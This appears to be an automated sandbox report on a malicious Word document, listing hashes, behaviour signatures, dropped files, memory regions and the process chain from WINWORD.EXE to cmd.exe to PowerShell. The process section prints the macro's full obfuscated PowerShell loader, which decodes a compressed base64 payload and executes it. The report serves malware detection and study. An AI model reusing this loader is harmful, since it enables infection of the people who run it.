Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-09-2024 07:53

General

  • Target

    e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc

  • Size

    84KB

  • MD5

    e8a69d43cb32354bd852c5ab9c071abe

  • SHA1

    11c101fc170253637726e5d1117a86dd2a2d9401

  • SHA256

    51cd6bdb18da6dc94549e067b04e727b9e947f2f189f5c27da67eb56f77c5f54

  • SHA512

    796c5403741abeacc76247f52a872d2b11aba408493a16263a10a99d9fff9111c8a9610dfbd9ece011dc60bd922a453259487d60bbf0e2a0f2f9b45ed08d2900

  • SSDEEP

    1536:c5ocn1kp59gxBK85fBt+a9AgIsTy4Ceh:B41k/W48jIt4CW

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4752
    • C:\Windows\SYSTEM32\CMD.exe
      CMD c:\wINdows\SYsTeM32\CmD.EXe /C "SeT OxnHJ= ^& ((GV '*MDr*').nAme[3,11,2]-joiN'') ( NEW-oBjEcT Io.sTReaMReadeR((NEW-oBjEcT Io.cOMPresSIon.dEFLaTESTreAm([iO.mEmoRYSTREam] [syStEm.conVeRt]::FroMBasE64StriNG( 'TZDBSsNAEIZfJYeFbYnZ1ApGugSKitCDFqzoxctmO+2m3czGzdBNW/LupkHF6/8N38z8bLeqcoSQuGIHmqIXIPEBxYMtAUmy3drm3BDVszQlCy15qEBoV6XON8vjaf7DDgoNeA8BtgZQFJAuflEIQWhVAZaNNknjNhSU7x0mPaJ9+zM0Zjq5zvpYoYZqT8OS9+0k+++hE+B0IKFOtEPqj0zv2lcuVrUtacTnfCyZL5+jPOLZzS2X7Gt5nzPAw4ygqmP+yeMLj7mAFrjcOA9KmxFDr6MSo8vD4zP545n1xYhHF9A6tX4qLQwzV9FFOJYLPLg9JIteOiSy6D172WlF2py77hs=' ),[Io.CoMpResSioN.ComPreSSIONMoDE]::DECompreSs)),[sYsTeM.tEXT.encODiNG]::ascii) ).rEADtoeNd( ) &&PoWeRSHElL sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN' ).Invoke( ( \"{1}{0}\" -f 'xnhJ','O' ),( \"{0}{1}\"-f 'Pr','oCEss') ) ) ^| ^& ( ${sH`eLl`Id}[1] + ${shE`L`LId}[13]+ 'x' )"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoWeRSHElL sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN' ).Invoke( ( \"{1}{0}\" -f 'xnhJ','O' ),( \"{0}{1}\"-f 'Pr','oCEss') ) ) | & ( ${sH`eLl`Id}[1] + ${shE`L`LId}[13]+ 'x' )
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1992

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\736.exe

    Filesize

    114B

    MD5

    e89f75f918dbdcee28604d4e09dd71d7

    SHA1

    f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

    SHA256

    6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

    SHA512

    8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

  • C:\Users\Admin\AppData\Local\Temp\736.exe

    Filesize

    3KB

    MD5

    fd49f81a6be3c0bd0890c039ae326d3a

    SHA1

    123b419063208eff02499f63e5bf69bb292ca916

    SHA256

    d9cca1f9d306e1985bda2987ce5adc11ad8c898c8ac9c8ba9d39af21c9fb4f45

    SHA512

    d7b8fe2d8214659779445654e48e7422c710f73fb3d333032b34d2e5ddff5c7157e926b4803646aea54c3d780310315961dd6bf647649e7361581dab0de46d6c

  • C:\Users\Admin\AppData\Local\Temp\TCD1DAC.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mnyyuh41.ttl.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

    Filesize

    2KB

    MD5

    01a15c7044dcd919150320c107365be5

    SHA1

    ff4ac0c6f20817b746ebada7b29de3d94aead621

    SHA256

    46f71988bb125d57b09f316897485a32e916458a717378909f3328f5249c72da

    SHA512

    e7ca6ef349c972c2dd3d6429dcd7386a63b4ba3e7832a03c4b6387f258012afc2a8f1b4021eb77888104718655dc50a400f579b9c5d33d26ca7bf57a4a2f202a

  • memory/1992-39-0x000001C7A3020000-0x000001C7A3042000-memory.dmp

    Filesize

    136KB

  • memory/4752-33-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-6-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-11-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-10-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-12-0x00007FFA6BBC0000-0x00007FFA6BBD0000-memory.dmp

    Filesize

    64KB

  • memory/4752-13-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-14-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-16-0x00007FFA6BBC0000-0x00007FFA6BBD0000-memory.dmp

    Filesize

    64KB

  • memory/4752-15-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-9-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-30-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-0-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-32-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-8-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-4-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-7-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-5-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-1-0x00007FFAAE4AD000-0x00007FFAAE4AE000-memory.dmp

    Filesize

    4KB

  • memory/4752-83-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-86-0x00007FFAAE4AD000-0x00007FFAAE4AE000-memory.dmp

    Filesize

    4KB

  • memory/4752-87-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-88-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-89-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-2-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-95-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB

  • memory/4752-3-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-592-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-595-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-594-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-593-0x00007FFA6E490000-0x00007FFA6E4A0000-memory.dmp

    Filesize

    64KB

  • memory/4752-596-0x00007FFAAE410000-0x00007FFAAE605000-memory.dmp

    Filesize

    2.0MB